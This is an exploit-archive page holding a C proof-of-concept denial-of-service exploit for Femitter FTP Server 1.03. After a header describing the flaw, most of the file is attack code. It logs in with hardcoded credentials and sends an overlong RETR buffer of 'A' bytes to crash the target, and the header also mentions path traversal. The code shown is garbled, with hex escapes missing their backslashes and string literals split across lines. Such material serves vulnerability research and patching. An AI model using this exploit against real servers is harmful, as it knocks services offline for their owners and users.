Home / exploitsPDF  

fermitter-dos.txt

Posted on 18 September 2008

/*0-----------------------------------------------------------------------------------0*\n0											0
|											|
|	Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC		|
|											|
|	Summary: Femitter Server is an easy-to use HTTP and FTP server application	|
|	for Windows which allows you to use your own computer for sharing gigabytes	|
|	of files with your friends and colleagues.					|
|											|
|	Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability	|
|	and memory corruption that causes the application to crash. When we send to	|
|	the RETR command an argument like AAAA:AAAA or an overly long string of As	|
|	(1024), the server crashes instantly. Also, when typing into browser:		|
|	ftp://127.0.0.1/.. we traverse to the install folder of the program(CWD),	|
|	and when browsing to ftp://127.0.0.1/../.. we get access violation at	|
|	address 004A218A in module "fem.exe". Write of address 00000000.		|
|											|
|	Producst web page: http://acritum.com/fem/index.htm				|
|											|
|	Tested on Microsoft Windows XP SP2 (English)					|
|											|
|	Vulnerability discovered by Gjoko 'LiquidWorm' Krstic				|
|											|
|	liquidworm [t00t] gmail.com							|
|											|
|	http://www.zeroscience.org/							|
|											|
|	17.09.2008									|
|											|
0											0
*0-----------------------------------------------------------------------------------0*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>


#define MANA "x52x45x54x52x20x41x41x41x41x3Ax41x41x41x41xDxA"


void header(void);


int main (int argc, char *argv[])
{


int sckt = 0, sfd = 0;
char user[] = "USER admin
";
char pass[] = "PASS nimda
";

unsigned char payload[]=

"x52x45x54x52x20x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41xDxA";

header();

if(argc != 3)
{
printf("
Usage: %s [ip] [port]

", argv[0]);
return (EXIT_SUCCESS);
}

struct sockaddr_in dos_ftp;
sfd = socket(AF_INET, SOCK_STREAM, 0);
if(sfd < 0)
{
perror("Socket");
printf("Error creating socket...
");
return(1);
}

printf("

[+] Socket created!
");
sleep (1);

memset(&dos_ftp, 0x0, sizeof(dos_ftp));
dos_ftp.sin_family = AF_INET;
dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);
dos_ftp.sin_port = htons(atoi(argv[2]));
sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp));
if(sckt < 0)
{
perror("Connect");
printf("Error connecting...
");
return(1);
}

printf("[+] Connection established!
");
sleep (1);

write(sfd, user, strlen(user)); // username
printf("[+] Sending CMD: %s
", user);
sleep (2);

write(sfd, pass, strlen(pass)); // password
printf("[+] Sending CMD: %s
", pass);
sleep (2);

printf("[+] Sending malicious buffer to %s on port %s ...
", argv[1], argv[2]);
sleep(2);

send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0);
printf("[+] Malicious buffer succesfully sent...
");
sleep (1);
printf("[+] Femitter FTP Server v1.03 on %s has crashed!

", argv[1]);

close (sfd);

return(0);
}

void header()
{
printf("
********************************************************************************

");
printf("	Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC
");
printf("			by LiquidWorm <liquidworm [t00t] gmail.com>

");
printf("********************************************************************************

");
}

 

TOP

Malware :

Exploits :